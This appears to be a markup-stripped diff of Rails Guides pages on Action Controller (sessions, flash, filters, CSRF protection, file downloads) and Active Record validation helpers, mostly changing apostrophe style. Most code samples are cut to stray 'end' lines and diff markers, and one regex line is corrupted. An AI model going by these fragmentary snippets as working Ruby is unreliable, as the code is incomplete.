                Session values are stored using key/value pairs like a hash:

                end end -end -
                -

                To remove something from the session, assign that key to be nil:

                +end
            +

            To remove something from the session, assign that key to be nil:

            redirect_to root_url end -end -
            -

            To reset the entire session, use reset_session.

            +end
          +

          To reset the entire session, use reset_session.

          4.3. The flash

          -

          The flash is a special part of the session which is cleared with each request. This means that values stored there will only be available in the next request, which is useful for storing error messages etc. It is accessed in much the same way as the session, like a hash. Let's use the act of logging out as an example. The controller can send a message which will be displayed to the user on the next request:

          +

          The flash is a special part of the session which is cleared with each request. This means that values stored there will only be available in the next request, which is useful for storing error messages etc. It is accessed in much the same way as the session, like a hash. Let’s use the act of logging out as an example. The controller can send a message which will be displayed to the user on the next request:

          redirect_to root_url end -end -
          -

          The destroy action redirects to the application's root_url, where the message will be displayed. Note that it's entirely up to the next action to decide what, if anything, it will do with what the previous action put in the flash. It's conventional to display eventual errors or notices from the flash in the application's layout:

          +end
      +

      The destroy action redirects to the application’s root_url, where the message will be displayed. Note that it’s entirely up to the next action to decide what, if anything, it will do with what the previous action put in the flash. It’s conventional to display eventual errors or notices from the flash in the application’s layout:

      <html>
      @@ -648,8 +636,8 @@ http://www.gnu.org/software/src-highlite -->
         </body>
       </html>
      -

      This way, if an action sets an error or a notice message, the layout will display it automatically.

      -

      If you want a flash value to be carried over to another request, use the keep method:

      +

      This way, if an action sets an error or a notice message, the layout will display it automatically.

      +

      If you want a flash value to be carried over to another request, use the keep method:

      redirect_to users_url end -end -
      +end

    4.3.1. flash.now

    -

    By default, adding values to the flash will make them available to the next request, but sometimes you may want to access those values in the same request. For example, if the create action fails to save a resource and you render the new template directly, that's not going to result in a new request, but you may still want to display a message using the flash. To do this, you can use flash.now in the same way you use the normal flash:

    +

    By default, adding values to the flash will make them available to the next request, but sometimes you may want to access those values in the same request. For example, if the create action fails to save a resource and you render the new template directly, that’s not going to result in a new request, but you may still want to display a message using the flash. To do this, you can use flash.now in the same way you use the normal flash:

    end end -end -
    +end

5. Cookies

-

Your application can store small amounts of data on the client - called cookies - that will be persisted across requests and even sessions. Rails provides easy access to cookies via the cookies method, which - much like the session - works like a hash:

+

Your application can store small amounts of data on the client - called cookies - that will be persisted across requests and even sessions. Rails provides easy access to cookies via the cookies method, which - much like the session - works like a hash:

end end -end -
-

Note that while for session values you set the key to nil, to delete a cookie value you should use cookies.delete(:key).

+end
+

Note that while for session values you set the key to nil, to delete a cookie value you should use cookies.delete(:key).

6. Filters

-

Filters are methods that are run before, after or "around" a controller action. For example, one filter might check to see if the logged in user has the right credentials to access that particular controller or action. Filters are inherited, so if you set a filter on ApplicationController, it will be run on every controller in your application. A common, simple filter is one which requires that a user is logged in for an action to be run. You can define the filter method this way:

+

Filters are methods that are run before, after or "around" a controller action. For example, one filter might check to see if the logged in user has the right credentials to access that particular controller or action. Filters are inherited, so if you set a filter on ApplicationController, it will be run on every controller in your application. A common, simple filter is one which requires that a user is logged in for an action to be run. You can define the filter method this way:

before_filter :require_login -end -
-

In this example, the filter is added to ApplicationController and thus all controllers in the application. This will make everything in the application require the user to be logged in in order to use it. For obvious reasons (the user wouldn't be able to log in in the first place!), not all controllers or actions should require this. You can prevent this filter from running before particular actions with skip_before_filter:

+end
+

In this example, the filter is added to ApplicationController and thus all controllers in the application. This will make everything in the application require the user to be logged in in order to use it. For obvious reasons (the user wouldn’t be able to log in in the first place!), not all controllers or actions should require this. You can prevent this filter from running before particular actions with skip_before_filter:

skip_before_filter :require_login, :only => [:new, :create] -end -
-

Now, the LoginsController's new and create actions will work as before without requiring the user to be logged in. The :only option is used to only skip this filter for these actions, and there is also an :except option which works the other way. These options can be used when adding filters too, so you can add a filter which only runs for selected actions in the first place.

+end +

Now, the LoginsController’s new and create actions will work as before without requiring the user to be logged in. The :only option is used to only skip this filter for these actions, and there is also an :except option which works the other way. These options can be used when adding filters too, so you can add a filter which only runs for selected actions in the first place.

6.1. After Filters and Around Filters

-

In addition to the before filters, you can run filters after an action has run or both before and after. The after filter is similar to the before filter, but because the action has already been run it has access to the response data that's about to be sent to the client. Obviously, after filters can not stop the action from running. Around filters are responsible for running the action, but they can choose not to, which is the around filter's way of stopping it.

+

In addition to the before filters, you can run filters after an action has run or both before and after. The after filter is similar to the before filter, but because the action has already been run it has access to the response data that’s about to be sent to the client. Obviously, after filters can not stop the action from running. Around filters are responsible for running the action, but they can choose not to, which is the around filter’s way of stopping it.

before_filter { |controller| redirect_to new_login_url unless controller.send(:logged_in?) } -end -
-

Note that the filter in this case uses send because the logged_in? method is private and the filter is not run in the scope of the controller. This is not the recommended way to implement this particular filter, but in more simple cases it might be useful.

-

The second way is to use a class (actually, any object that responds to the right methods will do) to handle the filtering. This is useful in cases that are more complex than can not be implemented in a readable and reusable way using the two other methods. As an example, you could rewrite the login filter again to use a class:

+end +

Note that the filter in this case uses send because the logged_in? method is private and the filter is not run in the scope of the controller. This is not the recommended way to implement this particular filter, but in more simple cases it might be useful.

+

The second way is to use a class (actually, any object that responds to the right methods will do) to handle the filtering. This is useful in cases that are more complex than can not be implemented in a readable and reusable way using the two other methods. As an example, you could rewrite the login filter again to use a class:

end end -end -
-

Again, this is not an ideal example for this filter, because it's not run in the scope of the controller but gets the controller passed as an argument. The filter class has a class method filter which gets run before or after the action, depending on if it's a before or after filter. Classes used as around filters can also use the same filter method, which will get run in the same way. The method must yield to execute the action. Alternatively, it can have both a before and an after method that are run before and after the action.

-

The Rails API documentation has more information on using filters.

+end +

Again, this is not an ideal example for this filter, because it’s not run in the scope of the controller but gets the controller passed as an argument. The filter class has a class method filter which gets run before or after the action, depending on if it’s a before or after filter. Classes used as around filters can also use the same filter method, which will get run in the same way. The method must yield to execute the action. Alternatively, it can have both a before and an after method that are run before and after the action.

+

The Rails API documentation has more information on using filters.

7. Verification

-

Verifications make sure certain criteria are met in order for a controller or action to run. They can specify that a certain key (or several keys in the form of an array) is present in the params, session or flash hashes or that a certain HTTP method was used or that the request was made using XMLHTTPRequest (Ajax). The default action taken when these criteria are not met is to render a 400 Bad Request response, but you can customize this by specifying a redirect URL or rendering something else and you can also add flash messages and HTTP headers to the response. It is described in the API documentation as "essentially a special kind of before_filter".

-

Here's an example of using verification to make sure the user supplies a username and a password in order to log in:

+

Verifications make sure certain criteria are met in order for a controller or action to run. They can specify that a certain key (or several keys in the form of an array) is present in the params, session or flash hashes or that a certain HTTP method was used or that the request was made using XMLHTTPRequest (Ajax). The default action taken when these criteria are not met is to render a 400 Bad Request response, but you can customize this by specifying a redirect URL or rendering something else and you can also add flash messages and HTTP headers to the response. It is described in the API documentation as "essentially a special kind of before_filter".

+

Here’s an example of using verification to make sure the user supplies a username and a password in order to log in:

end end -end -
-

Now the create action won't run unless the "username" and "password" parameters are present, and if they're not, an error message will be added to the flash and the new action will be rendered. But there's something rather important missing from the verification above: It will be used for every action in LoginsController, which is not what we want. You can limit which actions it will be used for with the :only and :except options just like a filter:

+end
+

Now the create action won’t run unless the "username" and "password" parameters are present, and if they’re not, an error message will be added to the flash and the new action will be rendered. But there’s something rather important missing from the verification above: It will be used for every action in LoginsController, which is not what we want. You can limit which actions it will be used for with the :only and :except options just like a filter:

:add_flash => {:error => "Username and password required to log in"}, :only => :create # Only run this verification for the "create" action -end -
+end

8. Request Forgery Protection

-

Cross-site request forgery is a type of attack in which a site tricks a user into making requests on another site, possibly adding, modifying or deleting data on that site without the user's knowledge or permission. The first step to avoid this is to make sure all "destructive" actions (create, update and destroy) can only be accessed with non-GET requests. If you're following RESTful conventions you're already doing this. However, a malicious site can still send a non-GET request to your site quite easily, and that's where the request forgery protection comes in. As the name says, it protects from forged requests. The way this is done is to add a non-guessable token which is only known to your server to each request. This way, if a request comes in without the proper token, it will be denied access.

-

If you generate a form like this:

+

Cross-site request forgery is a type of attack in which a site tricks a user into making requests on another site, possibly adding, modifying or deleting data on that site without the user’s knowledge or permission. The first step to avoid this is to make sure all "destructive" actions (create, update and destroy) can only be accessed with non-GET requests. If you’re following RESTful conventions you’re already doing this. However, a malicious site can still send a non-GET request to your site quite easily, and that’s where the request forgery protection comes in. As the name says, it protects from forged requests. The way this is done is to add a non-guessable token which is only known to your server to each request. This way, if a request comes in without the proper token, it will be denied access.

+

If you generate a form like this:

<% form_for @user do |f| -%>
   <%= f.text_field :username %>
   <%= f.text_field :password -%>
-<% end -%>
-
-

You will see how the token gets added as a hidden field:

+<% end -%>
+

You will see how the token gets added as a hidden field:

<form action="/users/1" method="post">
 <div><!-- ... --><input type="hidden" value="67250ab105eb5ad10851c00a5621854a23af5489" name="authenticity_token"/></div>
 <!-- Fields -->
-</form>
-
-

Rails adds this token to every form that's generated using the form helpers, so most of the time you don't have to worry about it. If you're writing a form manually or need to add the token for another reason, it's available through the method form_authenticity_token:

+</form> +

Rails adds this token to every form that’s generated using the form helpers, so most of the time you don’t have to worry about it. If you’re writing a form manually or need to add the token for another reason, it’s available through the method form_authenticity_token:

-
Example: Add a JavaScript variable containing the token for use with Ajax
+
Add a JavaScript variable containing the token for use with Ajax
<%= javascript_tag "MyApp.authenticity_token = '#{form_authenticity_token}'" %>
-

The Security Guide has more about this and a lot of other security-related issues that you should be aware of when developing a web application.

+

The Security Guide has more about this and a lot of other security-related issues that you should be aware of when developing a web application.

9. The request and response Objects

-

In every controller there are two accessor methods pointing to the request and the response objects associated with the request cycle that is currently in execution. The request method contains an instance of AbstractRequest and the response method returns a response object representing what is going to be sent back to the client.

+

In every controller there are two accessor methods pointing to the request and the response objects associated with the request cycle that is currently in execution. The request method contains an instance of AbstractRequest and the response method returns a response object representing what is going to be sent back to the client.

9.1. The request Object

-

The request object contains a lot of useful information about the request coming in from the client. To get a full list of the available methods, refer to the API documentation. Among the properties that you can access on this object are:

-
    +

    The request object contains a lot of useful information about the request coming in from the client. To get a full list of the available methods, refer to the API documentation. Among the properties that you can access on this object are:

    +
    • host - The hostname used for this request. @@ -934,7 +909,7 @@ host - The hostname used for this request.

    • -domain(n=2) - The hostname's first n segments, starting from the right (the TLD) +domain(n=2) - The hostname’s first n segments, starting from the right (the TLD)

    • @@ -984,10 +959,10 @@ url - The entire URL used for the request.

    9.1.1. path_parameters, query_parameters and request_parameters

    -

    Rails collects all of the parameters sent along with the request in the params hash, whether they are sent as part of the query string or the post body. The request object has three accessors that give you access to these parameters depending on where they came from. The query_parameters hash contains parameters that were sent as part of the query string while the request_parameters hash contains parameters sent as part of the post body. The path_parameters hash contains parameters that were recognized by the routing as being part of the path leading to this particular controller and action.

    +

    Rails collects all of the parameters sent along with the request in the params hash, whether they are sent as part of the query string or the post body. The request object has three accessors that give you access to these parameters depending on where they came from. The query_parameters hash contains parameters that were sent as part of the query string while the request_parameters hash contains parameters sent as part of the post body. The path_parameters hash contains parameters that were recognized by the routing as being part of the path leading to this particular controller and action.

    9.2. The response Object

    -

    The response object is not usually used directly, but is built up during the execution of the action and rendering of the data that is being sent back to the user, but sometimes - like in an after filter - it can be useful to access the response directly. Some of these accessor methods also have setters, allowing you to change their values.

    -
      +

      The response object is not usually used directly, but is built up during the execution of the action and rendering of the data that is being sent back to the user, but sometimes - like in an after filter - it can be useful to access the response directly. Some of these accessor methods also have setters, allowing you to change their values.

      +
      • body - This is the string of data being sent back to the client. This is most often HTML. @@ -1020,18 +995,17 @@ headers - Headers used for the response.

      9.2.1. Setting Custom Headers

      -

      If you want to set custom headers for a response then response.headers is the place to do it. The headers attribute is a hash which maps header names to their values, and Rails will set some of them - like "Content-Type" - automatically. If you want to add or change a header, just assign it to headers with the name and value:

      +

      If you want to set custom headers for a response then response.headers is the place to do it. The headers attribute is a hash which maps header names to their values, and Rails will set some of them - like "Content-Type" - automatically. If you want to add or change a header, just assign it to headers with the name and value:

      -
      response.headers["Content-Type"] = "application/pdf"
      -
      +
      response.headers["Content-Type"] = "application/pdf"

10. HTTP Basic Authentication

-

Rails comes with built-in HTTP Basic authentication. This is an authentication scheme that is supported by the majority of browsers and other HTTP clients. As an example, consider an administration section which will only be available by entering a username and a password into the browser's HTTP Basic dialog window. Using the built-in authentication is quite easy and only requires you to use one method, authenticate_or_request_with_http_basic.

+

Rails comes with built-in HTTP Basic authentication. This is an authentication scheme that is supported by the majority of browsers and other HTTP clients. As an example, consider an administration section which will only be available by entering a username and a password into the browser’s HTTP Basic dialog window. Using the built-in authentication is quite easy and only requires you to use one method, authenticate_or_request_with_http_basic.

send_data("#{RAILS_ROOT}/files/clients/#{client.id}.pdf", :filename => "#{client.name}.pdf", :type => "application/pdf") end -end -
-

This will read and stream the file 4Kb at the time, avoiding loading the entire file into memory at once. You can turn off streaming with the :stream option or adjust the block size with the :buffer_size option.

+end
+

This will read and stream the file 4Kb at the time, avoiding loading the entire file into memory at once. You can turn off streaming with the :stream option or adjust the block size with the :buffer_size option.

- +
Warning Be careful when using (or just don't use) "outside" data (params, cookies, etc) to locate the file on disk, as this is a security risk that might allow someone to gain access to files they are not meant to see.Be careful when using (or just don’t use) "outside" data (params, cookies, etc) to locate the file on disk, as this is a security risk that might allow someone to gain access to files they are not meant to see.
@@ -1122,7 +1093,7 @@ http://www.gnu.org/software/src-highlite -->

11.2. RESTful Downloads

-

While send_data works just fine, if you are creating a RESTful application having separate actions for file downloads is usually not necessary. In REST terminology, the PDF file from the example above can be considered just another representation of the client resource. Rails provides an easy and quite sleek way of doing "RESTful downloads". Here's how you can rewrite the example so that the PDF download is a part of the show action, without any streaming:

+

While send_data works just fine, if you are creating a RESTful application having separate actions for file downloads is usually not necessary. In REST terminology, the PDF file from the example above can be considered just another representation of the client resource. Rails provides an easy and quite sleek way of doing "RESTful downloads". Here’s how you can rewrite the example so that the PDF download is a part of the show action, without any streaming:

end end -end -
-

In order for this example to work, you have to add the PDF MIME type to Rails. This can be done by adding the following line to the file config/initializers/mime_types.rb:

+end +

In order for this example to work, you have to add the PDF MIME type to Rails. This can be done by adding the following line to the file config/initializers/mime_types.rb:

-
Mime::Type.register "application/pdf", :pdf
-
+
Mime::Type.register "application/pdf", :pdf
@@ -1158,7 +1127,7 @@ http://www.gnu.org/software/src-highlite --> Configuration files are not reloaded on each request, so you have to restart the server in order for their changes to take effect.
-

Now the user can request to get a PDF version of a client just by adding ".pdf" to the URL:

+

Now the user can request to get a PDF version of a client just by adding ".pdf" to the URL:

GET /clients/1.pdf
@@ -1166,7 +1135,7 @@ http://www.gnu.org/software/src-highlite -->

12. Parameter Filtering

-

Rails keeps a log file for each environment (development, test and production) in the log folder. These are extremely useful when debugging what's actually going on in your application, but in a live application you may not want every bit of information to be stored in the log file. The filter_parameter_logging method can be used to filter out sensitive information from the log. It works by replacing certain values in the params hash with "[FILTERED]" as they are written to the log. As an example, let's see how to filter all parameters with keys that include "password":

+

Rails keeps a log file for each environment (development, test and production) in the log folder. These are extremely useful when debugging what’s actually going on in your application, but in a live application you may not want every bit of information to be stored in the log file. The filter_parameter_logging method can be used to filter out sensitive information from the log. It works by replacing certain values in the params hash with "[FILTERED]" as they are written to the log. As an example, let’s see how to filter all parameters with keys that include "password":

filter_parameter_logging :password -end -
-

The method works recursively through all levels of the params hash and takes an optional second parameter which is used as the replacement string if present. It can also take a block which receives each key in turn and replaces those for which the block returns true.

+end
+

The method works recursively through all levels of the params hash and takes an optional second parameter which is used as the replacement string if present. It can also take a block which receives each key in turn and replaces those for which the block returns true.

13. Rescue

-

Most likely your application is going to contain bugs or otherwise throw an exception that needs to be handled. For example, if the user follows a link to a resource that no longer exists in the database, Active Record will throw the ActiveRecord::RecordNotFound exception. Rails' default exception handling displays a 500 Server Error message for all exceptions. If the request was made locally, a nice traceback and some added information gets displayed so you can figure out what went wrong and deal with it. If the request was remote Rails will just display a simple "500 Server Error" message to the user, or a "404 Not Found" if there was a routing error or a record could not be found. Sometimes you might want to customize how these errors are caught and how they're displayed to the user. There are several levels of exception handling available in a Rails application:

+

Most likely your application is going to contain bugs or otherwise throw an exception that needs to be handled. For example, if the user follows a link to a resource that no longer exists in the database, Active Record will throw the ActiveRecord::RecordNotFound exception. Rails' default exception handling displays a 500 Server Error message for all exceptions. If the request was made locally, a nice traceback and some added information gets displayed so you can figure out what went wrong and deal with it. If the request was remote Rails will just display a simple "500 Server Error" message to the user, or a "404 Not Found" if there was a routing error or a record could not be found. Sometimes you might want to customize how these errors are caught and how they’re displayed to the user. There are several levels of exception handling available in a Rails application:

13.1. The Default 500 and 404 Templates

-

By default a production application will render either a 404 or a 500 error message. These messages are contained in static HTML files in the public folder, in 404.html and 500.html respectively. You can customize these files to add some extra information and layout, but remember that they are static; i.e. you can't use RHTML or layouts in them, just plain HTML.

+

By default a production application will render either a 404 or a 500 error message. These messages are contained in static HTML files in the public folder, in 404.html and 500.html respectively. You can customize these files to add some extra information and layout, but remember that they are static; i.e. you can’t use RHTML or layouts in them, just plain HTML.

13.2. rescue_from

-

If you want to do something a bit more elaborate when catching errors, you can use rescue_from, which handles exceptions of a certain type (or multiple types) in an entire controller and its subclasses. When an exception occurs which is caught by a rescue_from directive, the exception object is passed to the handler. The handler can be a method or a Proc object passed to the :with option. You can also use a block directly instead of an explicit Proc object.

-

Here's how you can use rescue_from to intercept all ActiveRecord::RecordNotFound errors and do something with them.

+

If you want to do something a bit more elaborate when catching errors, you can use rescue_from, which handles exceptions of a certain type (or multiple types) in an entire controller and its subclasses. When an exception occurs which is caught by a rescue_from directive, the exception object is passed to the handler. The handler can be a method or a Proc object passed to the :with option. You can also use a block directly instead of an explicit Proc object.

+

Here’s how you can use rescue_from to intercept all ActiveRecord::RecordNotFound errors and do something with them.

class Person < ActiveRecord::Base
-end
-
-

We can see how it works by looking at the following script/console output:

+end
+

We can see how it works by looking at the following script/console output:

>> p = Person.new(:name => "John Doe", :birthdate => Date.parse("09/03/1979"))
@@ -405,7 +404,7 @@ http://www.gnu.org/software/src-highlite -->
 >> p.new_record?
 => false
-

Saving new records means sending an SQL insert operation to the database, while saving existing records (by calling either save or update_attributes) will result in a SQL update operation. Active Record will use these facts to perform validations upon your objects, avoiding then to be recorded to the database if their inner state is invalid in some way. You can specify validations that will be beformed every time a object is saved, just when you're creating a new record or when you're updating an existing one.

+

Saving new records means sending an SQL insert operation to the database, while saving existing records (by calling either save or update_attributes) will result in a SQL update operation. Active Record will use these facts to perform validations upon your objects, avoiding then to be recorded to the database if their inner state is invalid in some way. You can specify validations that will be beformed every time a object is saved, just when you’re creating a new record or when you’re updating an existing one.

@@ -415,15 +414,15 @@ http://www.gnu.org/software/src-highlite -->

2.2. The meaning of valid

-

For verifying if an object is valid, Active Record uses the valid? method, which basically looks inside the object to see if it has any validation errors. These errors live in a collection that can be accessed through the errors instance method. The proccess is really simple: If the errors method returns an empty collection, the object is valid and can be saved. Each time a validation fails, an error message is added to the errors collection.

+

For verifying if an object is valid, Active Record uses the valid? method, which basically looks inside the object to see if it has any validation errors. These errors live in a collection that can be accessed through the errors instance method. The proccess is really simple: If the errors method returns an empty collection, the object is valid and can be saved. Each time a validation fails, an error message is added to the errors collection.

3. The declarative validation helpers

-

Active Record offers many pre-defined validation helpers that you can use directly inside your class definitions. These helpers create validations rules that are commonly used in most of the applications that you'll write, so you don't need to recreate it everytime, avoiding code duplication, keeping everything organized and boosting your productivity. Everytime a validation fails, an error message is added to the object's errors collection, this message being associated with the field being validated.

-

Each helper accepts an arbitrary number of attributes, received as symbols, so with a single line of code you can add the same kind of validation to several attributes.

-

All these helpers accept the :on and :message options, which define when the validation should be applied and what message should be added to the errors collection when it fails, respectively. The :on option takes one the values :save (it's the default), :create or :update. There is a default error message for each one of the validation helpers. These messages are used when the :message option isn't used. Let's take a look at each one of the available helpers, listed in alphabetic order.

+

Active Record offers many pre-defined validation helpers that you can use directly inside your class definitions. These helpers create validations rules that are commonly used in most of the applications that you’ll write, so you don’t need to recreate it everytime, avoiding code duplication, keeping everything organized and boosting your productivity. Everytime a validation fails, an error message is added to the object’s errors collection, this message being associated with the field being validated.

+

Each helper accepts an arbitrary number of attributes, received as symbols, so with a single line of code you can add the same kind of validation to several attributes.

+

All these helpers accept the :on and :message options, which define when the validation should be applied and what message should be added to the errors collection when it fails, respectively. The :on option takes one the values :save (it’s the default), :create or :update. There is a default error message for each one of the validation helpers. These messages are used when the :message option isn’t used. Let’s take a look at each one of the available helpers, listed in alphabetic order.

3.1. The validates_acceptance_of helper

-

Validates that a checkbox has been checked for agreement purposes. It's normally used when the user needs to agree with your application's terms of service, confirm reading some clauses or any similar concept. This validation is very specific to web applications and actually this acceptance does not need to be recorded anywhere in your database (if you don't have a field for it, the helper will just create a virtual attribute).

+

Validates that a checkbox has been checked for agreement purposes. It’s normally used when the user needs to agree with your application’s terms of service, confirm reading some clauses or any similar concept. This validation is very specific to web applications and actually this acceptance does not need to be recorded anywhere in your database (if you don’t have a field for it, the helper will just create a virtual attribute).

class Person < ActiveRecord::Base
   validates_acceptance_of :terms_of_service
-end
-
-

The default error message for validates_acceptance_of is "must be accepted"

-

validates_acceptance_of can receive an :accept option, which determines the value that will be considered acceptance. It defaults to "1", but you can change it.

+end
+

The default error message for validates_acceptance_of is "must be accepted"

+

validates_acceptance_of can receive an :accept option, which determines the value that will be considered acceptance. It defaults to "1", but you can change it.

class Person < ActiveRecord::Base
   validates_acceptance_of :terms_of_service, :accept => 'yes'
-end
-
+end

3.2. The validates_associated helper

-

You should use this helper when your model has associations with other models and they also need to be validated. When you try to save your object, valid? will be called upon each one of the associated objects.

+

You should use this helper when your model has associations with other models and they also need to be validated. When you try to save your object, valid? will be called upon each one of the associated objects.

class Library < ActiveRecord::Base
   has_many :books
   validates_associated :books
-end
-
-

This validation will work with all the association types.

+end +

This validation will work with all the association types.

@@ -465,9 +461,9 @@ http://www.gnu.org/software/src-highlite --> Pay attention not to use validates_associated on both ends of your associations, because this will lead to several recursive calls and blow up the method calls' stack.
-

The default error message for validates_associated is "is invalid". Note that the errors for each failed validation in the associated objects will be set there and not in this model.

+

The default error message for validates_associated is "is invalid". Note that the errors for each failed validation in the associated objects will be set there and not in this model.

3.3. The validates_confirmation_of helper

-

You should use this helper when you have two text fields that should receive exactly the same content, like when you want to confirm an email address or password. This validation creates a virtual attribute, using the name of the field that has to be confirmed with _confirmation appended.

+

You should use this helper when you have two text fields that should receive exactly the same content, like when you want to confirm an email address or password. This validation creates a virtual attribute, using the name of the field that has to be confirmed with _confirmation appended.

class Person < ActiveRecord::Base
   validates_confirmation_of :email
-end
-
-

In your view template you could use something like

+end +

In your view template you could use something like

<%= text_field :person, :email %>
@@ -488,7 +483,7 @@ http://www.gnu.org/software/src-highlite -->
 
 Note
 
-This check is performed only if email_confirmation is not nil, and by default only on save. To require confirmation, make sure to add a presence check for the confirmation attribute (we'll take a look at validates_presence_of later on this guide):
+This check is performed only if email_confirmation is not nil, and by default only on save. To require confirmation, make sure to add a presence check for the confirmation attribute (we’ll take a look at validates_presence_of later on this guide):
 
 
@@ -499,11 +494,10 @@ http://www.gnu.org/software/src-highlite -->
class Person < ActiveRecord::Base
   validates_confirmation_of :email
   validates_presence_of :email_confirmation
-end
-
-

The default error message for validates_confirmation_of is "doesn't match confirmation"

+end
+

The default error message for validates_confirmation_of is "doesn’t match confirmation"

3.4. The validates_each helper

-

This helper validates attributes against a block. It doesn't have a predefined validation function. You should create one using a block, and every attribute passed to validates_each will be tested against it. In the following example, we don't want names and surnames to begin with lower case.

+

This helper validates attributes against a block. It doesn’t have a predefined validation function. You should create one using a block, and every attribute passed to validates_each will be tested against it. In the following example, we don’t want names and surnames to begin with lower case.

validates_each :name, :surname do |model, attr, value| model.errors.add(attr, 'Must start with upper case') if value =~ /^[a-z]/ end -end -
-

The block receives the model, the attribute's name and the attribute's value. If your validation fails, you can add an error message to the model, therefore making it invalid.

+end +

The block receives the model, the attribute’s name and the attribute’s value. If your validation fails, you can add an error message to the model, therefore making it invalid.

3.5. The validates_exclusion_of helper

-

This helper validates that the attributes' values are not included in a given set. In fact, this set can be any enumerable object.

+

This helper validates that the attributes' values are not included in a given set. In fact, this set can be any enumerable object.

class MovieFile < ActiveRecord::Base
   validates_exclusion_of :format, :in => %w(mov avi),
     :message => "Extension %s is not allowed"
-end
-
-

The validates_exclusion_of helper has an option :in that receives the set of values that will not be accepted for the validated attributes. The :in option has an alias called :within that you can use for the same purpose, if you'd like to. In the previous example we used the :message option to show how we can personalize it with the current attribute's value, through the %s format mask.

-

The default error message for validates_exclusion_of is "is not included in the list".

+end +

The validates_exclusion_of helper has an option :in that receives the set of values that will not be accepted for the validated attributes. The :in option has an alias called :within that you can use for the same purpose, if you’d like to. In the previous example we used the :message option to show how we can personalize it with the current attribute’s value, through the %s format mask.

+

The default error message for validates_exclusion_of is "is not included in the list".

3.6. The validates_format_of helper

-

This helper validates the attributes's values by testing if they match a given pattern. This pattern must be specified using a Ruby regular expression, which must be passed through the :with option.

+

This helper validates the attributes’s values by testing if they match a given pattern. This pattern must be specified using a Ruby regular expression, which must be passed through the :with option.

class Product < ActiveRecord::Base
   validates_format_of :description, :with => /^[a-zA-Z]+$/,
     :message => "Only letters allowed"
-end
-
-

The default error message for validates_format_of is "is invalid".

+end +

The default error message for validates_format_of is "is invalid".

3.7. The validates_inclusion_of helper

-

This helper validates that the attributes' values are included in a given set. In fact, this set can be any enumerable object.

+

This helper validates that the attributes' values are included in a given set. In fact, this set can be any enumerable object.

class Coffee < ActiveRecord::Base
   validates_inclusion_of :size, :in => %w(small medium large),
     :message => "%s is not a valid size"
-end
-
-

The validates_inclusion_of helper has an option :in that receives the set of values that will be accepted. The :in option has an alias called :within that you can use for the same purpose, if you'd like to. In the previous example we used the :message option to show how we can personalize it with the current attribute's value, through the %s format mask.

-

The default error message for validates_inclusion_of is "is not included in the list".

+end +

The validates_inclusion_of helper has an option :in that receives the set of values that will be accepted. The :in option has an alias called :within that you can use for the same purpose, if you’d like to. In the previous example we used the :message option to show how we can personalize it with the current attribute’s value, through the %s format mask.

+

The default error message for validates_inclusion_of is "is not included in the list".

3.8. The validates_length_of helper

-

This helper validates the length of your attribute's value. It can receive a variety of different options, so you can specify length contraints in different ways.

+

This helper validates the length of your attribute’s value. It can receive a variety of different options, so you can specify length contraints in different ways.

validates_length_of :bio, :maximum => 500 validates_length_of :password, :in => 6..20 validates_length_of :registration_number, :is => 6 -end -
-

The possible length constraint options are:

-
+

The possible length constraint options are:

+
-

The default error messages depend on the type of length validation being performed. You can personalize these messages, using the :wrong_length, :too_long and :too_short options and the %d format mask as a placeholder for the number corresponding to the length contraint being used. You can still use the :message option to specify an error message.

+

The default error messages depend on the type of length validation being performed. You can personalize these messages, using the :wrong_length, :too_long and :too_short options and the %d format mask as a placeholder for the number corresponding to the length contraint being used. You can still use the :message option to specify an error message.

class Person < ActiveRecord::Base
   validates_length_of :bio, :too_long => "you're writing too much. %d characters is the maximum allowed."
-end
-
-

This helper has an alias called validates_size_of, it's the same helper with a different name. You can use it if you'd like to.

+end +

This helper has an alias called validates_size_of, it’s the same helper with a different name. You can use it if you’d like to.

3.9. The validates_numericality_of helper

-

This helper validates that your attributes have only numeric values. By default, it will match an optional sign followed by a integral or floating point number. Using the :integer_only option set to true, you can specify that only integral numbers are allowed.

-

If you use :integer_only set to true, then it will use the /\A[+\-]?\d+\Z/ regular expression to validate the attribute's value. Otherwise, it will try to convert the value using Kernel.Float.

+

This helper validates that your attributes have only numeric values. By default, it will match an optional sign followed by a integral or floating point number. Using the :integer_only option set to true, you can specify that only integral numbers are allowed.

+

If you use :integer_only set to true, then it will use the /\A[+\-]?\d+\Z/+ regular expression to validate the attribute’s value. Otherwise, it will try to convert the value using +Kernel.Float.

class Player < ActiveRecord::Base
   validates_numericality_of :points
   validates_numericality_of :games_played, :integer_only => true
-end
-
-

The default error message for validates_numericality_of is "is not a number".

+end +

The default error message for validates_numericality_of is "is not a number".

3.10. The validates_presence_of helper

-

This helper validates that the attributes are not empty. It uses the blank? method to check if the value is either nil or an empty string (if the string has only spaces, it will still be considered empty).

+

This helper validates that the attributes are not empty. It uses the blank? method to check if the value is either nil or an empty string (if the string has only spaces, it will still be considered empty).

class Person < ActiveRecord::Base
   validates_presence_of :name, :login, :email
-end
-
+end
- +
Note If you want to be sure that an association is present, you'll need to test if the foreign key used to map the association is present, and not the associated object itself.If you want to be sure that an association is present, you’ll need to test if the foreign key used to map the association is present, and not the associated object itself.
@@ -646,19 +632,18 @@ http://www.gnu.org/software/src-highlite -->
class LineItem < ActiveRecord::Base
   belongs_to :order
   validates_presence_of :order_id
-end
-
+end
- +
Note If you want to validate the presence of a boolean field (where the real values are true and false), you will want to use validates_inclusion_of :field_name, :in ⇒ [true, false] This is due to the way Object#blank? handles boolean values. false.blank? # ⇒ trueIf you want to validate the presence of a boolean field (where the real values are true and false), you will want to use validates_inclusion_of :field_name, :in => [true, false] This is due to the way Object#blank? handles boolean values. false.blank? # => true
-

The default error message for validates_presence_of is "can't be empty".

+

The default error message for validates_presence_of is "can’t be empty".

3.11. The validates_uniqueness_of helper

-

This helper validates that the attribute's value is unique right before the object gets saved. It does not create a uniqueness constraint directly into your database, so it may happen that two different database connections create two records with the same value for a column that you wish were unique. To avoid that, you must create an unique index in your database.

+

This helper validates that the attribute’s value is unique right before the object gets saved. It does not create a uniqueness constraint directly into your database, so it may happen that two different database connections create two records with the same value for a column that you wish were unique. To avoid that, you must create an unique index in your database.

class Account < ActiveRecord::Base
   validates_uniqueness_of :email
-end
-
-

The validation happens by performing a SQL query into the model's table, searching for a record where the attribute that must be validated is equal to the value in the object being validated.

-

There is a :scope option that you can use to specify other attributes that must be used to define uniqueness:

+end +

The validation happens by performing a SQL query into the model’s table, searching for a record where the attribute that must be validated is equal to the value in the object being validated.

+

There is a :scope option that you can use to specify other attributes that must be used to define uniqueness:

class Holiday < ActiveRecord::Base
   validates_uniqueness_of :name, :scope => :year,
